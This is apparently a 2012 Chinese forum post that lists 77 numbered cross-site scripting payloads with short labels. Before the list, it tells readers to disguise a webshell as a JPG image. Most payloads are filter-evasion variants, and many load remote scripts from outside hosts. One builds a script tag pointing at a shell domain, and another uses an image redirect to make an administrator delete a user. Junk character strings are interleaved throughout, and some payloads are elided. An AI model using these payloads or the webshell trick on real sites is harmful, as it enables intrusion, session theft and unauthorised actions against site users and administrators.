跨站图片shell; B. h% W5 ^% U1 H G8 ]
XSS跨站代码 <script>alert("")</script>8 U+ h* _) g% U
& W1 F' ^( Z, M+ c
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
0 k6 O' J! c) J" d! D: L, o1 S
, d# Q( i& |, u4 n* h# h* D% h8 w% N+ c* S" A; q2 x
& s$ A7 z# R' d! V- C" ]' I8 O1)普通的XSS JavaScript注入3 O3 r: B/ ^. F
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>5 W$ q) C8 [; }$ V' B2 B. D
3 ]$ |! J8 u$ h% L$ o5 \
(2)IMG标签XSS使用JavaScript命令
, F; C1 F* d2 d% J% y<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ W8 o- r$ G) k, v+ x- C a
% r3 m4 v8 T6 H
(3)IMG标签无分号无引号
( F/ w8 b |! f4 C/ l<IMG SRC=javascript:alert(‘XSS’)>) _- h6 O2 F9 f2 O; H5 ~' u
! `. j0 t1 V" ~6 S
(4)IMG标签大小写不敏感
/ L) a( V. }( M<IMG SRC=JaVaScRiPt:alert(‘XSS’)>; E. a# B7 A; [5 j- ~
1 _, s7 \" T6 m/ j1 k- E, Z/ B(5)HTML编码(必须有分号)) J$ u7 X7 q$ i3 l) v) b1 ?: z' Y, k
<IMG SRC=javascript:alert(“XSS”)># n& ]: p; y! T* b- T. Z
; z" f6 g, C3 Q(6)修正缺陷IMG标签
# d. L4 ]) [$ r7 p8 B* N/ c, z; C<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
3 T0 f; ?3 D$ Z2 a( R+ v) X1 U; ~5 u7 p, B& P! o
(7)formCharCode标签(计算器)
* G- q4 D) j/ z! b<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>, R- b& @0 _5 |, q l- f$ u" @
( S9 L: H9 u D, P
(8)UTF-8的Unicode编码(计算器)
7 G; a( t& c2 Y, h. s; C<IMG SRC=jav..省略..S')>
3 l0 _+ ]" ?% m
( x2 [, ^6 F6 S5 Y+ O7 I$ S3 R(9)7位的UTF-8的Unicode编码是没有分号的(计算器)7 D1 Q' t1 ~" l0 t* m" D
<IMG SRC=jav..省略..S')>
9 T/ N4 P* l7 G# p
: e6 G X5 M6 {3 x. x7 H(10)十六进制编码也是没有分号(计算器)
( ~/ k# M4 \- a. K9 H<IMG SRC=java..省略..XSS')>
( K& y# G) r/ I0 h
* J3 |; V1 Y( ^: P% q( n(11)嵌入式标签,将Javascript分开
4 t2 d( L7 N2 {. o ]( B<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 q/ p+ N$ K) w X* m6 ]: f6 W3 @
$ }1 u; ^3 S. j V. \+ H7 @- p1 v(12)嵌入式编码标签,将Javascript分开
7 h: O- _% C. M<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 L/ @+ f) c+ n7 ~3 y# s
9 S& X9 d0 k, k5 }; z: m(13)嵌入式换行符
2 G! X! r! l+ I- J8 d( p, b$ @<IMG SRC=”jav ascript:alert(‘XSS’);”>! w- y" H7 W$ N) }; ]
5 M4 K/ d5 ~; j5 U
(14)嵌入式回车
+ |, `* }6 e# e5 J( T7 y<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ K+ Z2 i! m t, z+ Z
) b- M- {# X+ j" O/ I& c(15)嵌入式多行注入JavaScript,这是XSS极端的例子
4 w; U: `, k4 \4 N; {<IMG SRC=”javascript:alert(‘XSS‘)”>0 B/ Z& f! `6 u& w# i
6 Z9 b2 S4 t3 }7 P6 u' Q(16)解决限制字符(要求同页面)6 v7 J) ?- o: ]
<script>z=’document.’</script>
2 W3 h: M. H4 M* x' Z1 q<script>z=z+’write(“‘</script>" i7 ^: T# Q$ i) N
<script>z=z+’<script’</script>
6 a P& P [+ S" H& e+ G p<script>z=z+’ src=ht’</script>5 U* u' ~/ q. w3 w; t9 |
<script>z=z+’tp://ww’</script>. |2 [* O: `4 E/ r7 K
<script>z=z+’w.shell’</script>* W0 H. M8 M4 ]. _6 i' Y
<script>z=z+’.net/1.’</script>
6 u+ o3 E' b6 g# v4 e# u<script>z=z+’js></sc’</script>
* w" ]5 J& c- b% e) a% @5 t2 M<script>z=z+’ript>”)’</script>; Q3 p& y2 E( B$ Q
<script>eval_r(z)</script>
# u* R; q4 j" L k# Z) ]
3 Y8 v! { n8 P: j# k/ ~! b(17)空字符* x' A8 C4 h. u$ ?: B
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
# M, ?7 P- ], i' N* j( E7 g, S
$ e1 l5 ~ }; P(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
, Y9 G7 D) z( C, ]2 tperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out9 F/ ?) s' E% V% Z) \& P1 h+ A
j2 x" D% k ], c) |: j(19)Spaces和meta前的IMG标签# V. Y2 B' `- D$ Y) [
<IMG SRC=” javascript:alert(‘XSS’);”>& j2 E& s$ f- N+ X2 t* ?
$ K. J! S9 W; L(20)Non-alpha-non-digit XSS
; r% l! h4 p2 r) h3 ?<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% {1 l% ^. b8 K7 \2 U
! c: H# c% w0 b8 T# h9 r* x/ D
(21)Non-alpha-non-digit XSS to 2
. h0 N6 J( J! G# F/ k. L# b<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- u) a5 }* v: `3 M8 N& i, Q! E' F* i0 `( s4 `# ~+ M
(22)Non-alpha-non-digit XSS to 3
) z- v; s* V5 ]3 G<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! v( U: E4 v# f4 j
0 |+ c$ Y9 ]! j7 F. h1 m& k(23)双开括号
) I( p' t6 K8 @5 \' R<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! g2 u- W) b- e2 y. Z, t
. d# |. F6 S- x4 W(24)无结束脚本标记(仅火狐等浏览器)
3 M( H- l; u- ?7 l<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>! Q" _8 |8 p& E9 f4 N$ H
! e4 |1 h# d X5 B/ N/ d% l(25)无结束脚本标记2
, V& q: U- s+ h# E9 D$ C! E<SCRIPT SRC=//3w.org/XSS/xss.js>8 F/ v+ [8 q ], |- g2 F
' T! n3 e+ O+ t; A7 X
(26)半开的HTML/JavaScript XSS0 X, Y3 \. k- q+ G
<IMG SRC=”javascript:alert(‘XSS’)”8 l6 ?7 H' x+ R: C9 B7 v# e
/ w& M& S4 M# X& o$ `: v(27)双开角括号
, a0 O( @; V J. J3 B( Z. F! H6 |) t! q<iframe src=http://3w.org/XSS.html <# R6 W( J( ~& E% `
. Y# h a3 K x$ |, o' {# v
(28)无单引号 双引号 分号+ _9 p i6 u/ t
<SCRIPT>a=/XSS/9 W) n* M7 Q5 W4 E; \
alert(a.source)</SCRIPT>" E9 [# ^2 Y5 ?3 M
' X( I; s! o3 V5 W* x9 j" e(29)换码过滤的JavaScript
% t! A; [( x: i9 c0 y4 F% n7 ~\”;alert(‘XSS’);//
0 x$ I8 r4 o! b! a. Y* l( t! z6 {, v }3 e5 Y# M
(30)结束Title标签& n& r7 ~; Y* x: W8 u
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
1 M& R3 C5 E0 l O8 d. i
$ g% Q S/ O! o8 ?- E( K. K(31)Input Image+ A8 j0 v6 Y2 t" t" I
<INPUT SRC=”javascript:alert(‘XSS’);”>! I- p7 S# V) J& D9 k
9 E/ G; [1 B* K2 B(32)BODY Image
8 M3 i8 b5 t6 W) a8 m" J& R6 d<BODY BACKGROUND=”javascript:alert(‘XSS’)”> y. y- n8 N2 T9 T$ t4 X- {
$ ~' P! w- d4 }# d$ r. I! I
(33)BODY标签
1 o) [2 S. O L) Q<BODY(‘XSS’)>5 ~7 A/ |# }( _, @
% _$ Z" @2 F: V2 d$ g4 F(34)IMG Dynsrc
) W" m9 p- w, q7 C, Z* M<IMG DYNSRC=”javascript:alert(‘XSS’)”>
! K9 o8 ]! Q6 n% x8 D0 y. j
# i; C8 @' [* |4 T(35)IMG Lowsrc5 d3 c) G7 m) G4 V7 W7 p9 B) ^3 M
<IMG LOWSRC=”javascript:alert(‘XSS’)”>; s' Z: P; V4 Y- C: w. S
2 g: P; j) m7 e" B& G
(36)BGSOUND" E$ L1 R" _ l
<BGSOUND SRC=”javascript:alert(‘XSS’);”>6 s! W/ w$ a. X5 Y( Z
) ?1 \* `6 @7 N$ `% @(37)STYLE sheet
c% Q% S7 v& C9 ^$ R% X' o<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 C. V6 D1 L6 g& U" R2 |$ }! Z/ q" T5 O, Q# U' E
(38)远程样式表
7 M- i3 Y- i# F9 S( B0 H<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
, u( J8 g6 h4 B) F) k5 e/ m2 u* s5 c# c
(39)List-style-image(列表式)
- O9 Q$ r& X" h* w) }<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
% v6 o6 d6 n* Q
' e, w0 v/ @( q1 A(40)IMG VBscript3 f1 ^) u7 w- i% H! V
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
' N* z% ?6 q8 B: x8 L
4 V* ^- C* F8 p J p/ F(41)META链接url
% s" u; @) A, Z3 u<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>+ n5 z+ {" C9 R$ s6 `9 k) B
+ L: P$ ?0 a8 m( y(42)Iframe3 k6 U6 ^+ K8 q9 J) ~
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>2 q3 N: R; m8 H2 G0 F
(43)Frame5 e% _5 w/ |7 L
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
. U1 C. C3 g2 e# Q( u- C. @2 O: c; N6 E) i' y
(44)Table
: p: r7 U4 i4 {1 s- d; G<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
* M5 I' B# E- U' w# ]3 n
4 v$ S! F+ ]% N. p6 c(45)TD2 R" K" U/ M/ {) V6 _
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>5 y' P6 H8 i# W. ]& k; B" O: W
' l7 m$ k9 D. J; D, Y' }1 {(46)DIV background-image
5 h& h" m H/ l- a# A) K$ D; \<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 F! T' V, f/ g) W
; \ I# a5 [* ~+ v. r# |! h(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
$ n2 K A* z1 k2 }+ ~! k7 P- H<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
/ Z! B6 o! `& e! `* ]$ d- W" V4 y' B' |: c' I. F
(48)DIV expression' a7 I! P' T. _& a: V- j; N2 F
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
9 ?: ]) m/ }1 m$ k) o
$ o" [$ c2 ]7 N* \4 `0 k! }(49)STYLE属性分拆表达
& b9 q' e, e, |, c<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>2 h, m7 ?1 w R" j. O% g2 s
6 |9 H( P1 x2 m(50)匿名STYLE(组成:开角号和一个字母开头)1 h6 h0 v; ?6 e+ _
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
~8 M. S2 b- [' s& l+ o. O+ Z% x0 K/ ?8 h* { @, C0 D8 J: Y
(51)STYLE background-image
& g$ F7 j8 M. A; s<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
+ |& i5 M* E; `6 f3 w
. U' e5 l$ Y8 n4 Q9 B(52)IMG STYLE方式* b7 ^: Z9 k; w5 [. a4 k! ^+ V
exppression(alert(“XSS”))’>
4 i$ R( t% Q( y; ]5 y( ~. {* K3 L' u% i4 I. B9 s
(53)STYLE background2 j, Y0 c. e$ s7 A: N- F
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
$ q5 }7 I+ J6 R6 }7 d3 k" q
: n, \4 U0 b8 n1 y(54)BASE
% U& T5 t; O) z! \+ C/ |- K8 @<BASE HREF=”javascript:alert(‘XSS’);//”>
( n: n% c+ f2 L0 ~2 _
0 q/ y) @/ S) z(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
z: R+ f$ _( N3 z: p<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>: ^4 J }- o$ ]
2 \3 A4 s3 q! r; u: P( x
(56)在flash中使用ActionScrpt可以混进你XSS的代码
* {! J @3 r5 Ea=”get”;
+ B5 Q+ X3 h# {$ B2 nb=”URL(\”";
* `5 R7 @" \2 c; c5 D7 {+ hc=”javascript:”;
4 e' r3 W) E; j% \ jd=”alert(‘XSS’);\”)”;
6 H8 ? d' h% \eval_r(a+b+c+d);
~5 E* m4 m% t& e c1 N! m; M W3 n8 r, Y3 b, {
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上. y" r2 }3 k2 t4 v% Z
<HTML xmlns:xss>& h9 G% L2 ^& l9 j: d
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>' B, T3 Y s+ i; I! r0 h$ w
<xss:xss>XSS</xss:xss>" k- \# {, _3 t$ |( X
</HTML>
$ y- p) R) A$ R: K4 T1 _9 c4 @3 g
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
! b/ I# g/ h& @' }8 Q1 Y<SCRIPT SRC=””></SCRIPT>" O& m! t) M4 @/ ^+ \
9 s4 C& o( v0 o
(59)IMG嵌入式命令,可执行任意命令3 j- g# o2 _" |, s/ c; R
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
: }2 Y) d7 G6 _
; `, ?/ D/ k8 E/ q R(60)IMG嵌入式命令(a.jpg在同服务器)+ @! n: p; P" i$ X3 p) T
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser( `0 w. c: b" u5 d0 o& H
, R' A, Y. Q+ M$ N(61)绕符号过滤1 z( c7 {; @' I& w2 l8 P; I5 F
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>& z/ D6 R! r8 J, z$ Q$ k
% M( [1 Z6 Y4 g' r K1 f(62)
$ q% B9 P& ^3 k& w& i% }. K<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT> r4 G0 b+ u6 _
?7 B; @9 j- [7 s$ v0 f' ~3 x
(63)) J& l) a# X9 ~9 }! t. E; I
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
8 W+ t5 z1 H& p( K2 S
4 i# P, N2 B- Z% m" S- j1 \(64)+ r) O$ C6 b+ h
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
1 v ?/ U) B1 Y4 }* d1 ]
# C7 {* m, _! v% B(65)
, i% z2 t& S4 J1 X. W5 f<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
/ @6 M$ @% |* T- y1 k! G* f8 e
1 A% B: \$ }9 Y(66)5 _ i' K2 @ e7 R- X% o
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
' }% I. {5 ^/ m) v: W1 m+ D8 G$ K( v& n+ q9 k8 x, K/ C
(67)
% Q' N5 T2 w9 j5 c: S; K<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>8 A( ^' `$ z% W: [5 m2 h `
: p6 H( M9 I. E1 ](68)URL绕行
2 C( C$ L7 Y( A2 s# U p! R<A HREF=”http://127.0.0.1/”>XSS</A>* K0 P8 B, h' S; `" W! u0 X9 Y8 z
) _3 p1 f8 Y2 ~; i& W: |(69)URL编码2 M; m( c: v2 |5 Y
<A HREF=”http://3w.org”>XSS</A>
, _+ I; H9 O0 |3 m8 m% Q. u9 E$ G" a" M6 I8 T
(70)IP十进制
8 N! D/ R$ T% c' ^. ^<A HREF=”http://3232235521″>XSS</A> ^, H: T" y) t3 b
& Y3 L" e$ n3 ?0 z' x# Y/ j
(71)IP十六进制% n8 C- Y J+ j1 v+ M* K) \
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
" L" r2 R) r/ I: ^# M4 Y Q/ S8 x4 O- e3 U9 t
(72)IP八进制" Y% y8 `# B( D, m
<A HREF=”http://0300.0250.0000.0001″>XSS</A>0 L }9 N1 K& F" f
7 Q/ x' b/ Y+ K
(73)混合编码/ D+ M$ D1 T! f3 Y t
<A HREF=”h
4 F' t6 D2 i5 Z* C6 Mtt p://6 6.000146.0×7.147/”">XSS</A>. i5 L# B3 r6 O( f7 i
2 C' f) e0 L$ L. x! n
(74)节省[http:]6 f" x6 f, ^7 T" ?, _2 O
<A HREF=”//www.google.com/”>XSS</A>0 _6 i3 v2 n3 M( ^1 {
9 p: {9 o9 O. e2 B(75)节省[www]* I/ I9 H6 l, o4 Q, F8 E% Y
<A HREF=”http://google.com/”>XSS</A>5 t2 y6 F* w- G1 Y& I
! {6 {! W l% _- v. O( ^
(76)绝对点绝对DNS9 a% M8 n: M* B7 D+ `! S: W5 w- y
<A HREF=”http://www.google.com./”>XSS</A>$ e$ q$ T+ y* _- Y9 Z
( z- q, M7 j( w) b0 s* O) I
(77)javascript链接
! ^5 |1 l5 ^3 f" d) [<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>% B; F) r2 D# Q/ F2 H: H
|
发表于 2012-9-13 17:04:56
收藏
支持
反对